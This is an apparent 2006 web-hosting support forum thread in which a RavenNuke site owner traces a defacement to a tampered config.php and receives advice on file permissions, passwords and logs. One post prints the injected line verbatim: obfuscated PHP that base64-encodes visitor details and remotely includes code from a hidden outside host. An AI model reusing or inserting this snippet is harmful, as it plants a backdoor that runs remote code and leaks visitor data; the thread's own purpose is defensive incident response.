Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Ravens PHP Scripts And Web Hosting Forum Index -> Raven's RavenNuke(tm) v2.00.00 - v2.02.00 Distro
Author Message
gbhughs
Regular
Regular


Joined: Sep 11, 2004
Posts: 84

PostPosted: Mon May 01, 2006 4:26 pm Reply with quote

Somebody hacked my site today and somehow changed the title for every side block, news block, and link titles.

The only 2 blocks that are not effected by this are the Admin block (title is fine) and the Waiting Content block (title is fine).

The Nuke Sentinel tables were screwed up.

The table for nuke_nsnst_tracked_ips did not exist and it said that the table had crashed. So I fixed that table, and I still have the problem.

Here was the error I received for this table
Quote:
Error

SQL query: Edit

SHOW INDEX FROM `nuke_nsnst_tracked_ips` ;

MySQL said: Documentation
#1016 - Can't open file: 'nuke_nsnst_tracked_ips.MYI' (errno: 145)



Only registered users can see links on this board! Get registered or login! take a look and I need suggestions on how to solve this issue.

BTW:

I am using 76v2.02.....

Nuke sentinel v1.1.1(I think, came with the pkg?)

Thanks in advance
 
View user's profile Send private message
gbhughs
PostPosted: Mon May 01, 2006 4:39 pm Reply with quote

Answer to below post from: Only registered users can see links on this board! Get registered or login!

Stang5_0 wrote:
FYI

I am now having the same issue when lookin with myphpadmin, and I have made no changes recently. Can you please PM me the IP if you have one or post it here so we can compare notes?

Thanks,
Stang


The ips I had were:

Quote:
24.196.99.131
63.163.102
69.128.88.22
65.28.206.168
 
Guardian2003
Site Admin


Joined: Aug 28, 2003
Posts: 6792
Location: Ha Noi, Viet Nam

PostPosted: Mon May 01, 2006 5:37 pm Reply with quote

Are you sure you are using Ravenuke? I didn't see any copyright or credit messages.


Last edited by Guardian2003 on Mon May 01, 2006 5:45 pm; edited 1 time in total 
View user's profile Send private message Send e-mail
gbhughs
PostPosted: Mon May 01, 2006 5:39 pm Reply with quote

I'm sure....

I've discussed the copyright message with Raven
 
Guardian2003
PostPosted: Mon May 01, 2006 5:48 pm Reply with quote

I see you are already getting support in another thread, did you want to continue with tha thread or keep this new one?
 
fkelly
Former Moderator in Good Standing


Joined: Aug 30, 2005
Posts: 3312
Location: near Albany NY

PostPosted: Mon May 01, 2006 5:49 pm Reply with quote

Well, I've tried in both threads but the Sentinel version you listed is not even close to what comes with RN 2.02. To enable folks to help you here you really need to step back and tell us when and where you downloaded the distribution you are using, what you did to install it and when, and take a look at Sentinel in the admin screen and tell us what the version is.

It sounds like you loaded a Post Nuke (PN?) users table over the top of a RN users table? I can't say how feasible that is but did you load any other tables the same way?
 
View user's profile Send private message Visit poster's website
gbhughs
PostPosted: Mon May 01, 2006 5:49 pm Reply with quote

I saw that I posted that one in the wrong area and would like to use this one cause it is where it shoulda been to begin with.
 
gbhughs
PostPosted: Mon May 01, 2006 5:53 pm Reply with quote

I downloaded this oh about 2 months ago.

I'm sorry think I posted the wrong version.

Can I find the version number in here nuke_nsnst_config?

And if so this is what I came up with 2.4.2pl3.

BTW: Bear with me this is kinda new to me.
 
Guardian2003
PostPosted: Mon May 01, 2006 5:53 pm Reply with quote

OK.
As fkelly pointed out, we now need to establish exactly how you installed RN, if it was a fresh install or old data was transfered etc.
 
gbhughs
PostPosted: Mon May 01, 2006 5:55 pm Reply with quote

fkelly wrote:
It sounds like you loaded a Post Nuke (PN?) users table over the top of a RN users table? I can't say how feasible that is but did you load any other tables the same way?


I guess, if that is the technical term for this procedure.

I can say yes I added my PN users to this database, but I havent had any problems with this as of yet and that has been 2 months ago.

One more table I loaded over would be the stories table from and old PHP site (v 6.5 I think)

Other than that nothing else......

Fresh Install
Then I did the other 2 things mentioned above and that was it.
 
gbhughs
PostPosted: Mon May 01, 2006 7:01 pm Reply with quote

Well I have found the problem.

Somehow, someone was able to tamper with my config.php file.
I uploaded the original and now everything is working.

Now my question is how the h-e-double-L hockey sticks do I prevent this from happening again?
 
Guardian2003
PostPosted: Mon May 01, 2006 7:30 pm Reply with quote

What did you find in your config.php that had been changed?
Was it the database connection details?
 
kguske
Site Admin


Joined: Jun 04, 2004
Posts: 6383

PostPosted: Mon May 01, 2006 8:39 pm Reply with quote

Is it possible someone could've guess an FTP account / password? Public access? Some other way to upload files through a script?

_________________
I google, therefore I exist...
Only registered users can see links on this board! Get registered or login!
 
View user's profile Send private message
gbhughs
PostPosted: Mon May 01, 2006 8:52 pm Reply with quote

They added this line at the bottom of the file:
Quote:
error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str);}?>
 
Guardian2003
PostPosted: Tue May 02, 2006 7:03 am Reply with quote

What was the chmod set to for that file?
I am just trying to determine whether someone managed to edit (write to) the file directly as part of some cross site scripting attack.

ADMINS, do we want to remove that code and and put it in Only registered users can see links on this board! Get registered or login! for further analysis?
 
fkelly
PostPosted: Tue May 02, 2006 7:18 am Reply with quote

As Kguske pointed you should probably be concerned that someone might have administrative access to your site. Assuming you are in a hosted environment you might want to go change the passwords for whatever administrative panel you use and also for any FTP accounts you've set up.

Also, if you can tell when that config.php file was changed (exploited) you might look in your logs around that time and see if there is any suspicious activity.

Your Sentinel version is fairly new though there are some updates available. Just out of curiousity what version of Forums are you using? That should show at the bottom of your forums admin screen.
 
gbhughs
PostPosted: Tue May 02, 2006 9:49 am Reply with quote

Guardian2003 wrote:
What was the chmod set to for that file?


Well in doing some research I found that the permission was set for "world writable". I have now set this permission at 644.
 
gbhughs
PostPosted: Tue May 02, 2006 9:54 am Reply with quote

fkelly wrote:
As Kguske pointed you should probably be concerned that someone might have administrative access to your site. Assuming you are in a hosted environment you might want to go change the passwords for whatever administrative panel you use and also for any FTP accounts you've set up.


I have changed all passwords like you mentioned above.

fkelly wrote:
Also, if you can tell when that config.php file was changed (exploited) you might look in your logs around that time and see if there is any suspicious activity.


We are looking into this.....

fkelly wrote:
Your Sentinel version is fairly new though there are some updates available. Just out of curiousity what version of Forums are you using? That should show at the bottom of your forums admin screen.


I am running phpBB 2.0.19
 
Stang5_0
Hangin' Around


Joined: Oct 17, 2002
Posts: 49
Location: Phoenix, AZ

PostPosted: Mon May 08, 2006 9:47 am Reply with quote

gbhughs wrote:
Well I have found the problem.

Somehow, someone was able to tamper with my config.php file.
I uploaded the original and now everything is working.

Now my question is how the h-e-double-L hockey sticks do I prevent this from happening again?


Sad
I wish mine were that easy. My config.php looks fine, but when I try to go into myphpadmin to look at the DB's I get this at the top:

Error

SQL query: DocumentationEdit

SELECT COUNT( * ) AS num
FROM `sg`.`nuke_nsnst_tracked_ips`

MySQL said: Documentation
#1016 - Can't open file: 'nuke_nsnst_tracked_ips.MYD'. (errno: 145)

The last table listed is nuke_nsnst_protected_ranges
I was hoping a new config.php would be the ticket, but I don't think that is true in this case since like I said, mine has not been modified. Any suggestions here guys? I am running the latest package as well from Raven.

Thanks,
Stang
 
View user's profile Send private message Visit poster's website AIM Address Yahoo Messenger ICQ Number
montego
Site Admin


Joined: Aug 29, 2004
Posts: 9449
Location: Arizona

PostPosted: Tue May 09, 2006 6:04 am Reply with quote

Stang5_0, did you try running a table "repair" on that table or are you completely unable to even do that? You may need to get your ISP to try that for you... not sure why it got this way though.

_________________
Only registered users can see links on this board! Get registered or login!
Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
Stang5_0
PostPosted: Wed May 10, 2006 9:56 am Reply with quote

Can that be done with phpadmin?
My friend that used to work at the ISP that helped me with this has gone to another place of work and they have yet to find a replacement so at this point, I'm kinda on my own Sad
 
Display posts from previous:       
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Ravens PHP Scripts And Web Hosting Forum Index -> Raven's RavenNuke(tm) v2.00.00 - v2.02.00 Distro

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©